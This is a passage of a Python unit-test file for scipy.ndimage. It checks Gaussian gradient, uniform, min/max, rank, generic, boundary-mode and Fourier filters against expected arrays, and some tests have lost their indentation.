tmp1 = ndimage.gaussian_filter(array, 1.0, [1, 0])
tmp2 = ndimage.gaussian_filter(array, 1.0, [0, 1])
output = ndimage.gaussian_gradient_magnitude(array, 1.0)
expected = tmp1 * tmp1 + tmp2 * tmp2
expected = numpy.sqrt(expected).astype(type_)
assert_array_almost_equal(expected, output)
def test_gaussian_gradient_magnitude02(self):
for type_ in [numpy.int32, numpy.float32, numpy.float64]:
array = numpy.array([[3, 2, 5, 1, 4],
[5, 8, 3, 7, 1],
[5, 6, 9, 3, 5]], type_) * 100
tmp1 = ndimage.gaussian_filter(array, 1.0, [1, 0])
tmp2 = ndimage.gaussian_filter(array, 1.0, [0, 1])
output = numpy.zeros(array.shape, type_)
ndimage.gaussian_gradient_magnitude(array, 1.0, output)
expected = tmp1 * tmp1 + tmp2 * tmp2
expected = numpy.sqrt(expected).astype(type_)
assert_array_almost_equal(expected, output)
    def test_generic_gradient_magnitude01(self):
        # generic_gradient_magnitude with a gaussian_filter-based derivative
        # callback must reproduce gaussian_gradient_magnitude exactly.
        array = numpy.array([[3, 2, 5, 1, 4],
                             [5, 8, 3, 7, 1],
                             [5, 6, 9, 3, 5]], numpy.float64)
        def derivative(input, axis, output, mode, cval, a, b):
            # extra_arguments/extra_keywords are forwarded here as (a, b).
            sigma = [a, b / 2.0]
            input = numpy.asarray(input)
            order = [0] * input.ndim
            order[axis] = 1
            return ndimage.gaussian_filter(input, sigma, order,
                                           output, mode, cval)
        tmp1 = ndimage.gaussian_gradient_magnitude(array, 1.0)
        tmp2 = ndimage.generic_gradient_magnitude(
            array, derivative, extra_arguments=(1.0,),
            extra_keywords={'b': 2.0})
        assert_array_almost_equal(tmp1, tmp2)
def test_uniform01(self):
array = numpy.array([2, 4, 6])
size = 2
output = ndimage.uniform_filter1d(array, size, origin=-1)
assert_array_almost_equal([3, 5, 6], output)
def test_uniform02(self):
array = numpy.array([1, 2, 3])
filter_shape = [0]
output = ndimage.uniform_filter(array, filter_shape)
assert_array_almost_equal(array, output)
def test_uniform03(self):
array = numpy.array([1, 2, 3])
filter_shape = [1]
output = ndimage.uniform_filter(array, filter_shape)
assert_array_almost_equal(array, output)
def test_uniform04(self):
array = numpy.array([2, 4, 6])
filter_shape = [2]
output = ndimage.uniform_filter(array, filter_shape)
assert_array_almost_equal([2, 3, 5], output)
def test_uniform05(self):
array = []
filter_shape = [1]
output = ndimage.uniform_filter(array, filter_shape)
assert_array_almost_equal([], output)
def test_uniform06(self):
filter_shape = [2, 2]
for type1 in self.types:
array = numpy.array([[4, 8, 12],
[16, 20, 24]], type1)
for type2 in self.types:
output = ndimage.uniform_filter(
array, filter_shape, output=type2)
assert_array_almost_equal([[4, 6, 10], [10, 12, 16]], output)
assert_equal(output.dtype.type, type2)
def test_minimum_filter01(self):
array = numpy.array([1, 2, 3, 4, 5])
filter_shape = numpy.array([2])
output = ndimage.minimum_filter(array, filter_shape)
assert_array_almost_equal([1, 1, 2, 3, 4], output)
def test_minimum_filter02(self):
array = numpy.array([1, 2, 3, 4, 5])
filter_shape = numpy.array([3])
output = ndimage.minimum_filter(array, filter_shape)
assert_array_almost_equal([1, 1, 2, 3, 4], output)
def test_minimum_filter03(self):
array = numpy.array([3, 2, 5, 1, 4])
filter_shape = numpy.array([2])
output = ndimage.minimum_filter(array, filter_shape)
assert_array_almost_equal([3, 2, 2, 1, 1], output)
def test_minimum_filter04(self):
array = numpy.array([3, 2, 5, 1, 4])
filter_shape = numpy.array([3])
output = ndimage.minimum_filter(array, filter_shape)
assert_array_almost_equal([2, 2, 1, 1, 1], output)
def test_minimum_filter05(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
filter_shape = numpy.array([2, 3])
output = ndimage.minimum_filter(array, filter_shape)
assert_array_almost_equal([[2, 2, 1, 1, 1],
[2, 2, 1, 1, 1],
[5, 3, 3, 1, 1]], output)
def test_minimum_filter05_overlap(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
filter_shape = numpy.array([2, 3])
ndimage.minimum_filter(array, filter_shape, output=array)
assert_array_almost_equal([[2, 2, 1, 1, 1],
[2, 2, 1, 1, 1],
[5, 3, 3, 1, 1]], array)
def test_minimum_filter06(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 1, 1], [1, 1, 1]]
output = ndimage.minimum_filter(array, footprint=footprint)
assert_array_almost_equal([[2, 2, 1, 1, 1],
[2, 2, 1, 1, 1],
[5, 3, 3, 1, 1]], output)
# separable footprint should allow mode sequence
output2 = ndimage.minimum_filter(array, footprint=footprint,
mode=['reflect', 'reflect'])
assert_array_almost_equal(output2, output)
    def test_minimum_filter07(self):
        # A non-separable footprint produces the expected minima, and a
        # per-axis mode sequence must be rejected for such a footprint.
        array = numpy.array([[3, 2, 5, 1, 4],
                             [7, 6, 9, 3, 5],
                             [5, 8, 3, 7, 1]])
        footprint = [[1, 0, 1], [1, 1, 0]]
        output = ndimage.minimum_filter(array, footprint=footprint)
        assert_array_almost_equal([[2, 2, 1, 1, 1],
                                   [2, 3, 1, 3, 1],
                                   [5, 5, 3, 3, 1]], output)
        with assert_raises(RuntimeError):
            ndimage.minimum_filter(array, footprint=footprint,
                                   mode=['reflect', 'constant'])
def test_minimum_filter08(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 0, 1], [1, 1, 0]]
output = ndimage.minimum_filter(array, footprint=footprint, origin=-1)
assert_array_almost_equal([[3, 1, 3, 1, 1],
[5, 3, 3, 1, 1],
[3, 3, 1, 1, 1]], output)
def test_minimum_filter09(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 0, 1], [1, 1, 0]]
output = ndimage.minimum_filter(array, footprint=footprint,
origin=[-1, 0])
assert_array_almost_equal([[2, 3, 1, 3, 1],
[5, 5, 3, 3, 1],
[5, 3, 3, 1, 1]], output)
def test_maximum_filter01(self):
array = numpy.array([1, 2, 3, 4, 5])
filter_shape = numpy.array([2])
output = ndimage.maximum_filter(array, filter_shape)
assert_array_almost_equal([1, 2, 3, 4, 5], output)
def test_maximum_filter02(self):
array = numpy.array([1, 2, 3, 4, 5])
filter_shape = numpy.array([3])
output = ndimage.maximum_filter(array, filter_shape)
assert_array_almost_equal([2, 3, 4, 5, 5], output)
def test_maximum_filter03(self):
array = numpy.array([3, 2, 5, 1, 4])
filter_shape = numpy.array([2])
output = ndimage.maximum_filter(array, filter_shape)
assert_array_almost_equal([3, 3, 5, 5, 4], output)
def test_maximum_filter04(self):
array = numpy.array([3, 2, 5, 1, 4])
filter_shape = numpy.array([3])
output = ndimage.maximum_filter(array, filter_shape)
assert_array_almost_equal([3, 5, 5, 5, 4], output)
def test_maximum_filter05(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
filter_shape = numpy.array([2, 3])
output = ndimage.maximum_filter(array, filter_shape)
assert_array_almost_equal([[3, 5, 5, 5, 4],
[7, 9, 9, 9, 5],
[8, 9, 9, 9, 7]], output)
def test_maximum_filter06(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 1, 1], [1, 1, 1]]
output = ndimage.maximum_filter(array, footprint=footprint)
assert_array_almost_equal([[3, 5, 5, 5, 4],
[7, 9, 9, 9, 5],
[8, 9, 9, 9, 7]], output)
# separable footprint should allow mode sequence
output2 = ndimage.maximum_filter(array, footprint=footprint,
mode=['reflect', 'reflect'])
assert_array_almost_equal(output2, output)
    def test_maximum_filter07(self):
        # A non-separable footprint produces the expected maxima; passing a
        # per-axis mode sequence with such a footprint must be rejected.
        array = numpy.array([[3, 2, 5, 1, 4],
                             [7, 6, 9, 3, 5],
                             [5, 8, 3, 7, 1]])
        footprint = [[1, 0, 1], [1, 1, 0]]
        output = ndimage.maximum_filter(array, footprint=footprint)
        assert_array_almost_equal([[3, 5, 5, 5, 4],
                                   [7, 7, 9, 9, 5],
                                   [7, 9, 8, 9, 7]], output)
        # non-separable footprint should not allow mode sequence
        with assert_raises(RuntimeError):
            ndimage.maximum_filter(array, footprint=footprint,
                                   mode=['reflect', 'reflect'])
def test_maximum_filter08(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 0, 1], [1, 1, 0]]
output = ndimage.maximum_filter(array, footprint=footprint, origin=-1)
assert_array_almost_equal([[7, 9, 9, 5, 5],
[9, 8, 9, 7, 5],
[8, 8, 7, 7, 7]], output)
def test_maximum_filter09(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 0, 1], [1, 1, 0]]
output = ndimage.maximum_filter(array, footprint=footprint,
origin=[-1, 0])
assert_array_almost_equal([[7, 7, 9, 9, 5],
[7, 9, 8, 9, 7],
[8, 8, 8, 7, 7]], output)
def test_rank01(self):
array = numpy.array([1, 2, 3, 4, 5])
output = ndimage.rank_filter(array, 1, size=2)
assert_array_almost_equal(array, output)
output = ndimage.percentile_filter(array, 100, size=2)
assert_array_almost_equal(array, output)
output = ndimage.median_filter(array, 2)
assert_array_almost_equal(array, output)
def test_rank02(self):
array = numpy.array([1, 2, 3, 4, 5])
output = ndimage.rank_filter(array, 1, size=[3])
assert_array_almost_equal(array, output)
output = ndimage.percentile_filter(array, 50, size=3)
assert_array_almost_equal(array, output)
output = ndimage.median_filter(array, (3,))
assert_array_almost_equal(array, output)
def test_rank03(self):
array = numpy.array([3, 2, 5, 1, 4])
output = ndimage.rank_filter(array, 1, size=[2])
assert_array_almost_equal([3, 3, 5, 5, 4], output)
output = ndimage.percentile_filter(array, 100, size=2)
assert_array_almost_equal([3, 3, 5, 5, 4], output)
def test_rank04(self):
array = numpy.array([3, 2, 5, 1, 4])
expected = [3, 3, 2, 4, 4]
output = ndimage.rank_filter(array, 1, size=3)
assert_array_almost_equal(expected, output)
output = ndimage.percentile_filter(array, 50, size=3)
assert_array_almost_equal(expected, output)
output = ndimage.median_filter(array, size=3)
assert_array_almost_equal(expected, output)
def test_rank05(self):
array = numpy.array([3, 2, 5, 1, 4])
expected = [3, 3, 2, 4, 4]
output = ndimage.rank_filter(array, -2, size=3)
assert_array_almost_equal(expected, output)
def test_rank06(self):
array = numpy.array([[3, 2, 5, 1, 4],
[5, 8, 3, 7, 1],
[5, 6, 9, 3, 5]])
expected = [[2, 2, 1, 1, 1],
[3, 3, 2, 1, 1],
[5, 5, 3, 3, 1]]
output = ndimage.rank_filter(array, 1, size=[2, 3])
assert_array_almost_equal(expected, output)
output = ndimage.percentile_filter(array, 17, size=(2, 3))
assert_array_almost_equal(expected, output)
def test_rank06_overlap(self):
array = numpy.array([[3, 2, 5, 1, 4],
[5, 8, 3, 7, 1],
[5, 6, 9, 3, 5]])
array_copy = array.copy()
expected = [[2, 2, 1, 1, 1],
[3, 3, 2, 1, 1],
[5, 5, 3, 3, 1]]
ndimage.rank_filter(array, 1, size=[2, 3], output=array)
assert_array_almost_equal(expected, array)
ndimage.percentile_filter(array_copy, 17, size=(2, 3),
output=array_copy)
assert_array_almost_equal(expected, array_copy)
def test_rank07(self):
array = numpy.array([[3, 2, 5, 1, 4],
[5, 8, 3, 7, 1],
[5, 6, 9, 3, 5]])
expected = [[3, 5, 5, 5, 4],
[5, 5, 7, 5, 4],
[6, 8, 8, 7, 5]]
output = ndimage.rank_filter(array, -2, size=[2, 3])
assert_array_almost_equal(expected, output)
    def test_rank08(self):
        # The median of a 2x3 window (rank 3 of 6 elements, i.e. the 50th
        # percentile) is computed identically by percentile_filter,
        # rank_filter and median_filter; none of these non-separable
        # filters accepts a per-axis mode sequence.
        array = numpy.array([[3, 2, 5, 1, 4],
                             [5, 8, 3, 7, 1],
                             [5, 6, 9, 3, 5]])
        expected = [[3, 3, 2, 4, 4],
                    [5, 5, 5, 4, 4],
                    [5, 6, 7, 5, 5]]
        output = ndimage.percentile_filter(array, 50.0, size=(2, 3))
        assert_array_almost_equal(expected, output)
        output = ndimage.rank_filter(array, 3, size=(2, 3))
        assert_array_almost_equal(expected, output)
        output = ndimage.median_filter(array, size=(2, 3))
        assert_array_almost_equal(expected, output)
        # non-separable: does not allow mode sequence
        with assert_raises(RuntimeError):
            ndimage.percentile_filter(array, 50.0, size=(2, 3),
                                      mode=['reflect', 'constant'])
        with assert_raises(RuntimeError):
            ndimage.rank_filter(array, 3, size=(2, 3), mode=['reflect'] * 2)
        with assert_raises(RuntimeError):
            ndimage.median_filter(array, size=(2, 3), mode=['reflect'] * 2)
def test_rank09(self):
expected = [[3, 3, 2, 4, 4],
[3, 5, 2, 5, 1],
[5, 5, 8, 3, 5]]
footprint = [[1, 0, 1], [0, 1, 0]]
for type_ in self.types:
array = numpy.array([[3, 2, 5, 1, 4],
[5, 8, 3, 7, 1],
[5, 6, 9, 3, 5]], type_)
output = ndimage.rank_filter(array, 1, footprint=footprint)
assert_array_almost_equal(expected, output)
output = ndimage.percentile_filter(array, 35, footprint=footprint)
assert_array_almost_equal(expected, output)
def test_rank10(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
expected = [[2, 2, 1, 1, 1],
[2, 3, 1, 3, 1],
[5, 5, 3, 3, 1]]
footprint = [[1, 0, 1], [1, 1, 0]]
output = ndimage.rank_filter(array, 0, footprint=footprint)
assert_array_almost_equal(expected, output)
output = ndimage.percentile_filter(array, 0.0, footprint=footprint)
assert_array_almost_equal(expected, output)
def test_rank11(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
expected = [[3, 5, 5, 5, 4],
[7, 7, 9, 9, 5],
[7, 9, 8, 9, 7]]
footprint = [[1, 0, 1], [1, 1, 0]]
output = ndimage.rank_filter(array, -1, footprint=footprint)
assert_array_almost_equal(expected, output)
output = ndimage.percentile_filter(array, 100.0, footprint=footprint)
assert_array_almost_equal(expected, output)
    def test_rank12(self):
        # For a 3-element cross footprint, rank 1, the 50th percentile and
        # the median are all the same statistic -- all three filters must
        # produce identical output for every supported dtype.
        expected = [[3, 3, 2, 4, 4],
                    [3, 5, 2, 5, 1],
                    [5, 5, 8, 3, 5]]
        footprint = [[1, 0, 1], [0, 1, 0]]
        for type_ in self.types:
            array = numpy.array([[3, 2, 5, 1, 4],
                                 [5, 8, 3, 7, 1],
                                 [5, 6, 9, 3, 5]], type_)
            output = ndimage.rank_filter(array, 1, footprint=footprint)
            assert_array_almost_equal(expected, output)
            output = ndimage.percentile_filter(array, 50.0,
                                               footprint=footprint)
            assert_array_almost_equal(expected, output)
            output = ndimage.median_filter(array, footprint=footprint)
            assert_array_almost_equal(expected, output)
    def test_rank13(self):
        # Same cross-footprint median as test_rank12, but with the filter
        # origin shifted by -1 on every axis.
        expected = [[5, 2, 5, 1, 1],
                    [5, 8, 3, 5, 5],
                    [6, 6, 5, 5, 5]]
        footprint = [[1, 0, 1], [0, 1, 0]]
        for type_ in self.types:
            array = numpy.array([[3, 2, 5, 1, 4],
                                 [5, 8, 3, 7, 1],
                                 [5, 6, 9, 3, 5]], type_)
            output = ndimage.rank_filter(array, 1, footprint=footprint,
                                         origin=-1)
            assert_array_almost_equal(expected, output)
    def test_rank14(self):
        # Same as test_rank13 but with a per-axis origin: shifted by -1 on
        # axis 0 only.
        expected = [[3, 5, 2, 5, 1],
                    [5, 5, 8, 3, 5],
                    [5, 6, 6, 5, 5]]
        footprint = [[1, 0, 1], [0, 1, 0]]
        for type_ in self.types:
            array = numpy.array([[3, 2, 5, 1, 4],
                                 [5, 8, 3, 7, 1],
                                 [5, 6, 9, 3, 5]], type_)
            output = ndimage.rank_filter(array, 1, footprint=footprint,
                                         origin=[-1, 0])
            assert_array_almost_equal(expected, output)
def test_rank15(self):
"rank filter 15"
expected = [[2, 3, 1, 4, 1],
[5, 3, 7, 1, 1],
[5, 5, 3, 3, 3]]
footprint = [[1, 0, 1], [0, 1, 0]]
for type_ in self.types:
array = numpy.array([[3, 2, 5, 1, 4],
[5, 8, 3, 7, 1],
[5, 6, 9, 3, 5]], type_)
output = ndimage.rank_filter(array, 0, footprint=footprint,
origin=[-1, 0])
assert_array_almost_equal(expected, output)
    def test_generic_filter1d01(self):
        # generic_filter1d driving a Python callback must match correlate1d
        # with the same (normalized) weights.
        weights = numpy.array([1.1, 2.2, 3.3])
        def _filter_func(input, output, fltr, total):
            # Hand-written normalized 3-tap correlation.  `fltr` arrives via
            # extra_arguments and `total` via extra_keywords.
            fltr = fltr / total
            for ii in range(input.shape[0] - 2):
                output[ii] = input[ii] * fltr[0]
                output[ii] += input[ii + 1] * fltr[1]
                output[ii] += input[ii + 2] * fltr[2]
        for type_ in self.types:
            a = numpy.arange(12, dtype=type_)
            a.shape = (3, 4)
            # Reference: built-in 1-d correlation with the same normalized
            # weights, same axis and origin.
            r1 = ndimage.correlate1d(a, weights / weights.sum(), 0, origin=-1)
            r2 = ndimage.generic_filter1d(
                a, _filter_func, 3, axis=0, origin=-1,
                extra_arguments=(weights,),
                extra_keywords={'total': weights.sum()})
            assert_array_almost_equal(r1, r2)
def test_generic_filter01(self):
filter_ = numpy.array([[1.0, 2.0], [3.0, 4.0]])
footprint = numpy.array([[1, 0], [0, 1]])
cf = numpy.array([1., 4.])
def _filter_func(buffer, weights, total=1.0):
weights = cf / total
return (buffer * weights).sum()
for type_ in self.types:
a = numpy.arange(12, dtype=type_)
a.shape = (3, 4)
r1 = ndimage.correlate(a, filter_ * footprint)
if type_ in self.float_types:
r1 /= 5
else:
r1 //= 5
r2 = ndimage.generic_filter(
a, _filter_func, footprint=footprint, extra_arguments=(cf,),
extra_keywords={'total': cf.sum()})
assert_array_almost_equal(r1, r2)
# generic_filter doesn't allow mode sequence
with assert_raises(RuntimeError):
r2 = ndimage.generic_filter(
a, _filter_func, mode=['reflect', 'reflect'],
footprint=footprint, extra_arguments=(cf,),
extra_keywords={'total': cf.sum()})
    def test_extend01(self):
        # Weights [1, 0] pick the sample one position to the left, probing
        # the boundary extension.  One row of expected_values per mode in
        # self.modes (presumably ['nearest', 'wrap', 'reflect', 'mirror',
        # 'constant'] -- the rows are consistent with that order; confirm
        # against the class definition).
        array = numpy.array([1, 2, 3])
        weights = numpy.array([1, 0])
        expected_values = [[1, 1, 2],
                           [3, 1, 2],
                           [1, 1, 2],
                           [2, 1, 2],
                           [0, 1, 2]]
        for mode, expected_value in zip(self.modes, expected_values):
            output = ndimage.correlate1d(array, weights, 0,
                                         mode=mode, cval=0)
            assert_array_equal(output, expected_value)
    def test_extend02(self):
        # An 8-tap weight with the 1 at the far left reaches several samples
        # past the boundary of the 3-element input; one row of
        # expected_values per mode in self.modes.
        array = numpy.array([1, 2, 3])
        weights = numpy.array([1, 0, 0, 0, 0, 0, 0, 0])
        expected_values = [[1, 1, 1],
                           [3, 1, 2],
                           [3, 3, 2],
                           [1, 2, 3],
                           [0, 0, 0]]
        for mode, expected_value in zip(self.modes, expected_values):
            output = ndimage.correlate1d(array, weights, 0,
                                         mode=mode, cval=0)
            assert_array_equal(output, expected_value)
    def test_extend03(self):
        # Weights [0, 0, 1] pick the sample one position to the right,
        # probing the right-hand boundary extension; one row of
        # expected_values per mode in self.modes.
        array = numpy.array([1, 2, 3])
        weights = numpy.array([0, 0, 1])
        expected_values = [[2, 3, 3],
                           [2, 3, 1],
                           [2, 3, 3],
                           [2, 3, 2],
                           [2, 3, 0]]
        for mode, expected_value in zip(self.modes, expected_values):
            output = ndimage.correlate1d(array, weights, 0,
                                         mode=mode, cval=0)
            assert_array_equal(output, expected_value)
    def test_extend04(self):
        # A 9-tap weight with the 1 at the far right reaches several samples
        # past the right-hand boundary; one row of expected_values per mode
        # in self.modes.
        array = numpy.array([1, 2, 3])
        weights = numpy.array([0, 0, 0, 0, 0, 0, 0, 0, 1])
        expected_values = [[3, 3, 3],
                           [2, 3, 1],
                           [2, 1, 1],
                           [1, 2, 3],
                           [0, 0, 0]]
        for mode, expected_value in zip(self.modes, expected_values):
            output = ndimage.correlate1d(array, weights, 0,
                                         mode=mode, cval=0)
            assert_array_equal(output, expected_value)
    def test_extend05(self):
        # 2-d boundary extension: the single active weight selects the
        # up-left neighbor, so the top row and left column come from the
        # extension; one expected 2-d array per mode in self.modes.
        array = numpy.array([[1, 2, 3],
                             [4, 5, 6],
                             [7, 8, 9]])
        weights = numpy.array([[1, 0], [0, 0]])
        expected_values = [[[1, 1, 2], [1, 1, 2], [4, 4, 5]],
                           [[9, 7, 8], [3, 1, 2], [6, 4, 5]],
                           [[1, 1, 2], [1, 1, 2], [4, 4, 5]],
                           [[5, 4, 5], [2, 1, 2], [5, 4, 5]],
                           [[0, 0, 0], [0, 1, 2], [0, 4, 5]]]
        for mode, expected_value in zip(self.modes, expected_values):
            output = ndimage.correlate(array, weights,
                                       mode=mode, cval=0)
            assert_array_equal(output, expected_value)
    def test_extend06(self):
        # 2-d boundary extension toward the bottom-right: the single active
        # weight sits at the kernel's bottom-right corner, so the last row
        # and column come from the extension; one expected array per mode.
        array = numpy.array([[1, 2, 3],
                             [4, 5, 6],
                             [7, 8, 9]])
        weights = numpy.array([[0, 0, 0], [0, 0, 0], [0, 0, 1]])
        expected_values = [[[5, 6, 6], [8, 9, 9], [8, 9, 9]],
                           [[5, 6, 4], [8, 9, 7], [2, 3, 1]],
                           [[5, 6, 6], [8, 9, 9], [8, 9, 9]],
                           [[5, 6, 5], [8, 9, 8], [5, 6, 5]],
                           [[5, 6, 0], [8, 9, 0], [0, 0, 0]]]
        for mode, expected_value in zip(self.modes, expected_values):
            output = ndimage.correlate(array, weights,
                                       mode=mode, cval=0)
            assert_array_equal(output, expected_value)
    def test_extend07(self):
        # Same scenario as test_extend04 but through the n-d correlate
        # entry point on a 1-d input.
        # NOTE(review): byte-identical to test_extend09 -- apparent
        # duplicate.
        array = numpy.array([1, 2, 3])
        weights = numpy.array([0, 0, 0, 0, 0, 0, 0, 0, 1])
        expected_values = [[3, 3, 3],
                           [2, 3, 1],
                           [2, 1, 1],
                           [1, 2, 3],
                           [0, 0, 0]]
        for mode, expected_value in zip(self.modes, expected_values):
            output = ndimage.correlate(array, weights, mode=mode, cval=0)
            assert_array_equal(output, expected_value)
    def test_extend08(self):
        # Column-vector version of test_extend07: the same far-edge probe
        # applied along axis 0 of a (3, 1) array.
        array = numpy.array([[1], [2], [3]])
        weights = numpy.array([[0], [0], [0], [0], [0], [0], [0], [0], [1]])
        expected_values = [[[3], [3], [3]],
                           [[2], [3], [1]],
                           [[2], [1], [1]],
                           [[1], [2], [3]],
                           [[0], [0], [0]]]
        for mode, expected_value in zip(self.modes, expected_values):
            output = ndimage.correlate(array, weights, mode=mode, cval=0)
            assert_array_equal(output, expected_value)
    def test_extend09(self):
        # NOTE(review): byte-identical to test_extend07 (only the call
        # formatting differs) -- apparent duplicate.
        array = numpy.array([1, 2, 3])
        weights = numpy.array([0, 0, 0, 0, 0, 0, 0, 0, 1])
        expected_values = [[3, 3, 3],
                           [2, 3, 1],
                           [2, 1, 1],
                           [1, 2, 3],
                           [0, 0, 0]]
        for mode, expected_value in zip(self.modes, expected_values):
            output = ndimage.correlate(array, weights,
                                       mode=mode, cval=0)
            assert_array_equal(output, expected_value)
    def test_extend10(self):
        # NOTE(review): byte-identical to test_extend08 (only the call
        # formatting differs) -- apparent duplicate.
        array = numpy.array([[1], [2], [3]])
        weights = numpy.array([[0], [0], [0], [0], [0], [0], [0], [0], [1]])
        expected_values = [[[3], [3], [3]],
                           [[2], [3], [1]],
                           [[2], [1], [1]],
                           [[1], [2], [3]],
                           [[0], [0], [0]]]
        for mode, expected_value in zip(self.modes, expected_values):
            output = ndimage.correlate(array, weights,
                                       mode=mode, cval=0)
            assert_array_equal(output, expected_value)
def test_boundaries(self):
def shift(x):
return (x[0] + 0.5,)
data = numpy.array([1, 2, 3, 4.])
expected = {'constant': [1.5, 2.5, 3.5, -1, -1, -1, -1],
'wrap': [1.5, 2.5, 3.5, 1.5, 2.5, 3.5, 1.5],
'mirror': [1.5, 2.5, 3.5, 3.5, 2.5, 1.5, 1.5],
'nearest': [1.5, 2.5, 3.5, 4, 4, 4, 4]}
for mode in expected:
assert_array_equal(
expected[mode],
ndimage.geometric_transform(data, shift, cval=-1, mode=mode,
output_shape=(7,), order=1))
def test_boundaries2(self):
def shift(x):
return (x[0] - 0.9,)
data = numpy.array([1, 2, 3, 4])
expected = {'constant': [-1, 1, 2, 3],
'wrap': [3, 1, 2, 3],
'mirror': [2, 1, 2, 3],
'nearest': [1, 1, 2, 3]}
for mode in expected:
assert_array_equal(
expected[mode],
ndimage.geometric_transform(data, shift, cval=-1, mode=mode,
output_shape=(4,)))
def test_fourier_gaussian_real01(self):
for shape in [(32, 16), (31, 15)]:
for type_, dec in zip([numpy.float32, numpy.float64], [6, 14]):
a = numpy.zeros(shape, type_)
a[0, 0] = 1.0
a = fft.rfft(a, shape[0], 0)
a = fft.fft(a, shape[1], 1)
a = ndimage.fourier_gaussian(a, [5.0, 2.5], shape[0], 0)
a = fft.ifft(a, shape[1], 1)
a = fft.irfft(a, shape[0], 0)
assert_almost_equal(ndimage.sum(a), 1, decimal=dec)
    def test_fourier_gaussian_complex01(self):
        # Same invariant as the real01 variant but on a full complex FFT:
        # filtering a unit impulse must leave the total (real) sum at 1.
        for shape in [(32, 16), (31, 15)]:
            for type_, dec in zip([numpy.complex64, numpy.complex128], [6, 14]):
                a = numpy.zeros(shape, type_)
                a[0, 0] = 1.0
                a = fft.fft(a, shape[0], 0)
                a = fft.fft(a, shape[1], 1)
                # n=-1: axis 0 holds a full complex FFT, not an rfft half.
                a = ndimage.fourier_gaussian(a, [5.0, 2.5], -1, 0)
                a = fft.ifft(a, shape[1], 1)
                a = fft.ifft(a, shape[0], 0)
                assert_almost_equal(ndimage.sum(a.real), 1.0, decimal=dec)
    def test_fourier_uniform_real01(self):
        # Fourier-domain uniform (box) filter on a real-FFT'd unit impulse
        # must preserve the DC component: total sum stays 1.
        for shape in [(32, 16), (31, 15)]:
            for type_, dec in zip([numpy.float32, numpy.float64], [6, 14]):
                a = numpy.zeros(shape, type_)
                a[0, 0] = 1.0
                a = fft.rfft(a, shape[0], 0)
                a = fft.fft(a, shape[1], 1)
                a = ndimage.fourier_uniform(a, [5.0, 2.5], shape[0], 0)
                a = fft.ifft(a, shape[1], 1)
                a = fft.irfft(a, shape[0], 0)
                assert_almost_equal(ndimage.sum(a), 1.0, decimal=dec)
    def test_fourier_uniform_complex01(self):
        # Full-complex-FFT variant of test_fourier_uniform_real01: total
        # real sum of the filtered impulse stays 1.
        for shape in [(32, 16), (31, 15)]:
            for type_, dec in zip([numpy.complex64, numpy.complex128], [6, 14]):
                a = numpy.zeros(shape, type_)
                a[0, 0] = 1.0
                a = fft.fft(a, shape[0], 0)
                a = fft.fft(a, shape[1], 1)
                # n=-1: axis 0 holds a full complex FFT, not an rfft half.
                a = ndimage.fourier_uniform(a, [5.0, 2.5], -1, 0)
                a = fft.ifft(a, shape[1], 1)
                a = fft.ifft(a, shape[0], 0)
                assert_almost_equal(ndimage.sum(a.real), 1.0, decimal=dec)
    def test_fourier_shift_real01(self):
        # A Fourier-domain shift of (1, 1) must reproduce the input offset
        # by one sample on each axis, with a negligible imaginary part.
        for shape in [(32, 16), (31, 15)]:
            for type_, dec in zip([numpy.float32, numpy.float64], [4, 11]):
                expected = numpy.arange(shape[0] * shape[1], dtype=type_)
                expected.shape = shape
                a = fft.rfft(expected, shape[0], 0)
                a = fft.fft(a, shape[1], 1)
                a = ndimage.fourier_shift(a, [1, 1], shape[0], 0)
                a = fft.ifft(a, shape[1], 1)
                a = fft.irfft(a, shape[0], 0)
                # Compare the overlapping region after the one-sample shift.
                assert_array_almost_equal(a[1:, 1:], expected[:-1, :-1],
                                          decimal=dec)
                assert_array_almost_equal(a.imag, numpy.zeros(shape),
                                          decimal=dec)
    def test_fourier_shift_complex01(self):
        # Full-complex-FFT variant of test_fourier_shift_real01: the (1, 1)
        # Fourier shift offsets the data by one sample on each axis.
        for shape in [(32, 16), (31, 15)]:
            for type_, dec in zip([numpy.complex64, numpy.complex128], [4, 11]):
                expected = numpy.arange(shape[0] * shape[1], dtype=type_)
                expected.shape = shape
                a = fft.fft(expected, shape[0], 0)
                a = fft.fft(a, shape[1], 1)
                # n=-1: axis 0 holds a full complex FFT, not an rfft half.
                a = ndimage.fourier_shift(a, [1, 1], -1, 0)
                a = fft.ifft(a, shape[1], 1)
                a = fft.ifft(a, shape[0], 0)
                assert_array_almost_equal(a.real[1:, 1:], expected[:-1, :-1],
                                          decimal=dec)
                assert_array_almost_equal(a.imag, numpy.zeros(shape),
                                          decimal=dec)
    def test_fourier_ellipsoid_real01(self):
        # Fourier-domain ellipsoid filter on a real-FFT'd unit impulse must
        # preserve the DC component: total sum stays 1.
        for shape in [(32, 16), (31, 15)]:
            for type_, dec in zip([numpy.float32, numpy.float64], [5, 14]):
                a = numpy.zeros(shape, type_)
                a[0, 0] = 1.0
                a = fft.rfft(a, shape[0], 0)
                a = fft.fft(a, shape[1], 1)
                a = ndimage.fourier_ellipsoid(a, [5.0, 2.5],
                                              shape[0], 0)
                a = fft.ifft(a, shape[1], 1)
                a = fft.irfft(a, shape[0], 0)
                assert_almost_equal(ndimage.sum(a), 1.0, decimal=dec)
